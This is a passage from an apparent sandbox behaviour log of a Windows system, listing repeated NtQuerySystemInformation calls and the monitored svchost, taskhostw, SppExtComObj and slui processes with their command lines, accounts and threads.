(SystemInformationClass=0xb9, SystemInformation=0xc751dfdda0, Length=0x28, ResultLength=0x0) [0274.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfde80, Length=0x38, ResultLength=0x0) [0274.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd00, Length=0x20, ResultLength=0x0) [0274.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc80, Length=0x20, ResultLength=0x0) [0274.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc80, Length=0x20, ResultLength=0x0) [0274.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc80, Length=0x20, ResultLength=0x0) [0274.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfde80, Length=0x38, ResultLength=0x0) [0274.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd00, Length=0x20, ResultLength=0x0) [0274.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc90, Length=0x20, ResultLength=0x0) [0274.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc90, Length=0x20, ResultLength=0x0) [0274.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdf50, Length=0x50, ResultLength=0x0) [0274.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfded0, Length=0x28, ResultLength=0x0) [0274.546] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0274.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdf50, Length=0x50, ResultLength=0x0) [0274.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdf50, Length=0x50, ResultLength=0x0) [0274.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdf50, Length=0x50, ResultLength=0x0) [0274.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfde80, Length=0x38, ResultLength=0x0) [0274.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdcb0, Length=0x28, ResultLength=0x0) [0274.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdcb0, Length=0x28, ResultLength=0x0) [0274.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdcb0, Length=0x28, ResultLength=0x0) [0274.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd20, Length=0x28, ResultLength=0x0) [0274.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfde80, Length=0x38, ResultLength=0x0) [0274.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdda0, Length=0x28, ResultLength=0x0) [0274.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdda0, Length=0x28, ResultLength=0x0) [0274.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfde80, Length=0x38, ResultLength=0x0) [0274.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd00, Length=0x20, ResultLength=0x0) [0274.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc80, Length=0x20, ResultLength=0x0) [0274.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc80, Length=0x20, ResultLength=0x0) [0274.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc80, Length=0x20, ResultLength=0x0) [0274.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfde80, Length=0x38, ResultLength=0x0) [0274.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd00, Length=0x20, ResultLength=0x0) [0274.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc90, Length=0x20, ResultLength=0x0) [0274.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc90, Length=0x20, ResultLength=0x0) [0274.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) Thread: id = 642 os_tid = 0xf30 Thread: id = 663 os_tid = 0xed0 Process: id = "42" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x20190000" os_pid = "0x774" os_integrity_level = "0x4000" os_privileges = "0x60a00000" monitor_reason = "child_process" parent_id = "24" os_parent_pid = "0x23c" cmd_line = "C:\\WINDOWS\\system32\\svchost.exe -k NetworkServiceNetworkRestricted" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\PolicyAgent" [0xe], "NT AUTHORITY\\Logon Session 00000000:0008793b" [0xc000000f], "LOCAL" [0x7] Thread: id = 643 os_tid = 0xe30 Thread: id = 644 os_tid = 0x1310 Thread: id = 645 os_tid = 0x12a8 Thread: id = 646 os_tid = 0xfac Thread: id = 647 os_tid = 0xf9c Thread: id = 648 os_tid = 0x1284 Process: id = "43" image_name = "taskhostw.exe" filename = "c:\\windows\\system32\\taskhostw.exe" page_root = "0xc970000" os_pid = "0x12a4" os_integrity_level = "0x4000" os_privileges = "0x1e60b1e890" monitor_reason = "child_process" parent_id = "15" os_parent_pid = "0x3ac" cmd_line = "taskhostw.exe -RegisterDevice -SettingChange -Full" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xe], "NT SERVICE\\BITS" [0xe], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\dmwappushservice" [0xa], "NT SERVICE\\DoSvc" [0xe], "NT SERVICE\\DsmSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\IKEEXT" [0xe], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\lfsvc" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\NcaSvc" [0xa], "NT SERVICE\\NetSetupSvc" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\UsoSvc" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wisvc" [0xe], "NT SERVICE\\wlidsvc" [0xe], "NT SERVICE\\WpnService" [0xe], "NT SERVICE\\wuauserv" [0xe], "S-1-5-80-603222039-1779857981-708438124-1730083285-3435298639" [0xa], "NT SERVICE\\XboxNetApiSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:00009f6a" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 659 os_tid = 0x1380 Thread: id = 665 os_tid = 0x55c Thread: id = 669 os_tid = 0x728 Thread: id = 693 os_tid = 0x12b0 Thread: id = 695 os_tid = 0x1304 Thread: id = 696 os_tid = 0x1294 Thread: id = 697 os_tid = 0xf08 Process: id = "44" image_name = "sppextcomobj.exe" filename = "c:\\windows\\system32\\sppextcomobj.exe" page_root = "0x1f8ed000" os_pid = "0xabc" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "25" os_parent_pid = "0x2a4" cmd_line = "C:\\WINDOWS\\system32\\SppExtComObj.exe -Embedding" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\sppsvc" [0xe], "NT AUTHORITY\\Logon Session 00000000:000766d2" [0xc000000f], "LOCAL" [0x7] Thread: id = 671 os_tid = 0xab0 [0242.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) Thread: id = 672 os_tid = 0xcf4 Thread: id = 673 os_tid = 0x1194 Thread: id = 674 os_tid = 0xdb4 Thread: id = 675 os_tid = 0x113c Process: id = "45" image_name = "slui.exe" filename = "c:\\windows\\system32\\slui.exe" page_root = "0x2bc19000" os_pid = "0x13cc" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "44" os_parent_pid = "0xabc" cmd_line = "\"C:\\WINDOWS\\System32\\SLUI.exe\" RuleId=3482d82e-ca2c-4e1f-8864-da0267b484b2;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=TimerEvent" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\sppsvc" [0xe], "NT AUTHORITY\\Logon Session 00000000:000766d2" [0xc000000f], "LOCAL" [0x7] Thread: id = 676 os_tid = 0x1114 Thread: id = 677 os_tid = 0x1150 Thread: id = 678 os_tid = 0x13a4 Thread: id = 679 os_tid = 0x13a8 Thread: id = 680 os_tid = 0xb90 Thread: id = 681 os_tid = 0x97c Thread: id = 682 os_tid = 0xd0c Process: id = "46" image_name = "slui.exe" filename = "c:\\windows\\system32\\slui.exe" page_root = "0x72ddb000" os_pid = "0xf20" os_integrity_level = "0x2000" os_privileges = "0x40800000" monitor_reason = "child_process" parent_id = "25" os_parent_pid = "0x2a4" cmd_line = "C:\\WINDOWS\\System32\\slui.exe -Embedding" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 700 os_tid = 0x860 Thread: id = 701 os_tid = 0x874 Thread: id = 702 os_tid = 0xdd8 Thread: id = 703 os_tid = 0xfe0 Thread: id = 704 os_tid = 0x136c Thread: id = 705 os_tid = 0xf0c